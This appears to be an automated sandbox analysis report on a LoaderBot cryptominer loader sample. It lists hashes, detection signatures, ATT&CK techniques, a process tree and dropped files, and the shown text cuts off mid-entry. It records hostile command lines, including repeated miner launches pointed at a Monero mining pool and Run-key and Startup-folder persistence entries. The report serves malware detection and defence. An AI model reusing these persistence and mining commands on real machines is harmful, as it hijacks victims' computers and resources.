loaderbot | edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669

Analysis

max time kernel
159s
max time network
43s
platform
windows7_x64
resource
win7-20220414-en
submitted
08-05-2022 22:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
Size

2.9MB
MD5

012f0b24edc0229cde14c6ea38f25044
SHA1

ae5143c5744f9cd4d97b0df86911b6fcf740214e
SHA256

edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669
SHA512

ff94a226ffdeda9ac2860cca28152d9e0367f39e61e152186b76292b479091dcb03503eb92f732b5dd25db1b873d9068e262cd0f7522bda8e7ba91c43a926c7e

Score

10^/10

loaderbot loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

LoaderBot executable 1 IoCs

resource	yara_rule
behavioral1/memory/1516-65-0x0000000000920000-0x0000000001136000-memory.dmp	loaderbot

Executes dropped EXE 32 IoCs

pid	Process
1516	Miner Asazello Soft.exe
1632	launch64.exe
1176	Driver.exe
1656	Driver.exe
1636	Driver.exe
1928	Driver.exe
1144	Driver.exe
1140	Driver.exe
1916	Driver.exe
992	Driver.exe
2020	Driver.exe
2044	Driver.exe
2032	Driver.exe
1064	Driver.exe
1540	Driver.exe
544	Driver.exe
1308	Driver.exe
1572	Driver.exe
1788	Driver.exe
1020	Driver.exe
1052	Driver.exe
2040	Driver.exe
1572	Driver.exe
1660	Driver.exe
1288	Driver.exe
1720	Driver.exe
844	Driver.exe
1176	Driver.exe
948	Driver.exe
1760	Driver.exe
1508	Driver.exe
1116	Driver.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Miner Asazello Soft.exe

Loads dropped DLL 5 IoCs

pid	Process
1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
1516	Miner Asazello Soft.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Miner Asazello Soft.exe"	Miner Asazello Soft.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe
1516	Miner Asazello Soft.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1516	Miner Asazello Soft.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1516	Miner Asazello Soft.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 1516	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	27
PID 1972 wrote to memory of 1516	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	27
PID 1972 wrote to memory of 1516	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	27
PID 1972 wrote to memory of 1516	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	27
PID 1972 wrote to memory of 1632	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	28
PID 1972 wrote to memory of 1632	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	28
PID 1972 wrote to memory of 1632	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	28
PID 1972 wrote to memory of 1632	1972	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	28
PID 1516 wrote to memory of 1176	1516	Miner Asazello Soft.exe	29
PID 1516 wrote to memory of 1176	1516	Miner Asazello Soft.exe	29
PID 1516 wrote to memory of 1176	1516	Miner Asazello Soft.exe	29
PID 1516 wrote to memory of 1176	1516	Miner Asazello Soft.exe	29
PID 1516 wrote to memory of 1656	1516	Miner Asazello Soft.exe	31
PID 1516 wrote to memory of 1656	1516	Miner Asazello Soft.exe	31
PID 1516 wrote to memory of 1656	1516	Miner Asazello Soft.exe	31
PID 1516 wrote to memory of 1656	1516	Miner Asazello Soft.exe	31
PID 1516 wrote to memory of 1636	1516	Miner Asazello Soft.exe	33
PID 1516 wrote to memory of 1636	1516	Miner Asazello Soft.exe	33
PID 1516 wrote to memory of 1636	1516	Miner Asazello Soft.exe	33
PID 1516 wrote to memory of 1636	1516	Miner Asazello Soft.exe	33
PID 1516 wrote to memory of 1928	1516	Miner Asazello Soft.exe	36
PID 1516 wrote to memory of 1928	1516	Miner Asazello Soft.exe	36
PID 1516 wrote to memory of 1928	1516	Miner Asazello Soft.exe	36
PID 1516 wrote to memory of 1928	1516	Miner Asazello Soft.exe	36
PID 1516 wrote to memory of 1144	1516	Miner Asazello Soft.exe	38
PID 1516 wrote to memory of 1144	1516	Miner Asazello Soft.exe	38
PID 1516 wrote to memory of 1144	1516	Miner Asazello Soft.exe	38
PID 1516 wrote to memory of 1144	1516	Miner Asazello Soft.exe	38
PID 1516 wrote to memory of 1140	1516	Miner Asazello Soft.exe	40
PID 1516 wrote to memory of 1140	1516	Miner Asazello Soft.exe	40
PID 1516 wrote to memory of 1140	1516	Miner Asazello Soft.exe	40
PID 1516 wrote to memory of 1140	1516	Miner Asazello Soft.exe	40
PID 1516 wrote to memory of 1916	1516	Miner Asazello Soft.exe	42
PID 1516 wrote to memory of 1916	1516	Miner Asazello Soft.exe	42
PID 1516 wrote to memory of 1916	1516	Miner Asazello Soft.exe	42
PID 1516 wrote to memory of 1916	1516	Miner Asazello Soft.exe	42
PID 1516 wrote to memory of 992	1516	Miner Asazello Soft.exe	44
PID 1516 wrote to memory of 992	1516	Miner Asazello Soft.exe	44
PID 1516 wrote to memory of 992	1516	Miner Asazello Soft.exe	44
PID 1516 wrote to memory of 992	1516	Miner Asazello Soft.exe	44
PID 1516 wrote to memory of 2020	1516	Miner Asazello Soft.exe	46
PID 1516 wrote to memory of 2020	1516	Miner Asazello Soft.exe	46
PID 1516 wrote to memory of 2020	1516	Miner Asazello Soft.exe	46
PID 1516 wrote to memory of 2020	1516	Miner Asazello Soft.exe	46
PID 1516 wrote to memory of 2044	1516	Miner Asazello Soft.exe	48
PID 1516 wrote to memory of 2044	1516	Miner Asazello Soft.exe	48
PID 1516 wrote to memory of 2044	1516	Miner Asazello Soft.exe	48
PID 1516 wrote to memory of 2044	1516	Miner Asazello Soft.exe	48
PID 1516 wrote to memory of 2032	1516	Miner Asazello Soft.exe	50
PID 1516 wrote to memory of 2032	1516	Miner Asazello Soft.exe	50
PID 1516 wrote to memory of 2032	1516	Miner Asazello Soft.exe	50
PID 1516 wrote to memory of 2032	1516	Miner Asazello Soft.exe	50
PID 1516 wrote to memory of 1064	1516	Miner Asazello Soft.exe	53
PID 1516 wrote to memory of 1064	1516	Miner Asazello Soft.exe	53
PID 1516 wrote to memory of 1064	1516	Miner Asazello Soft.exe	53
PID 1516 wrote to memory of 1064	1516	Miner Asazello Soft.exe	53
PID 1516 wrote to memory of 1540	1516	Miner Asazello Soft.exe	54
PID 1516 wrote to memory of 1540	1516	Miner Asazello Soft.exe	54
PID 1516 wrote to memory of 1540	1516	Miner Asazello Soft.exe	54
PID 1516 wrote to memory of 1540	1516	Miner Asazello Soft.exe	54
PID 1516 wrote to memory of 544	1516	Miner Asazello Soft.exe	56
PID 1516 wrote to memory of 544	1516	Miner Asazello Soft.exe	56
PID 1516 wrote to memory of 544	1516	Miner Asazello Soft.exe	56
PID 1516 wrote to memory of 544	1516	Miner Asazello Soft.exe	56

C:\Users\Admin\AppData\Local\Temp\edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
"C:\Users\Admin\AppData\Local\Temp\edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe
  "C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1176
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1656
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1636
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1928
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1144
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1140
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1916
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:992
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:2020
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:2044
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:2032
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1064
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1540
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:544
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1308
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1572
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1788
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1020
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1052
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:2040
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1572
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1660
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1288
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1720
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:844
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1176
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:948
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1760
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1508
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:1116
- C:\Users\Admin\AppData\Roaming\1337\launch64.exe
  "C:\Users\Admin\AppData\Roaming\1337\launch64.exe"
  2⤵
  - Executes dropped EXE
  PID:1632

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe

Filesize
3.1MB

MD5
7567e0843e8dba94e2cef2c8950d2142

SHA1
a15622d460ea78774c64fc4861855b1a4f15d856

SHA256
0a00cd6b0b16daeb30e89fad8af9ca56deaebe174e2ae49c71950ca1b05af26c

SHA512
0fd88b2dfbcad30010a1d4123e29a91d6c8f5c2d32a9a9657320dfb589a60dac0175c62328db67d46418e6f895e6d5a8c3e85da61d4bf2e78c58281607a2297e

Download Submit
C:\Users\Admin\AppData\Roaming\1337\launch64.exe

Filesize
5KB

MD5
c4058a8f14764847f3b6d80ec64216ce

SHA1
8701b828da7b599e6e883200d33d3004e4bbf5df

SHA256
dc1c764312aeef02b69bf71ceddcbee2525a776c910a1346a85c81db7a082c62

SHA512
4608dedb3ba910b7a7df9d55ea7e2752f92c58df6d43e61fe299e5b7856012cf3ffb9fe780b7988d0e18f57abdd0502fc64334d2a97815991f502e45b63ea23b

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
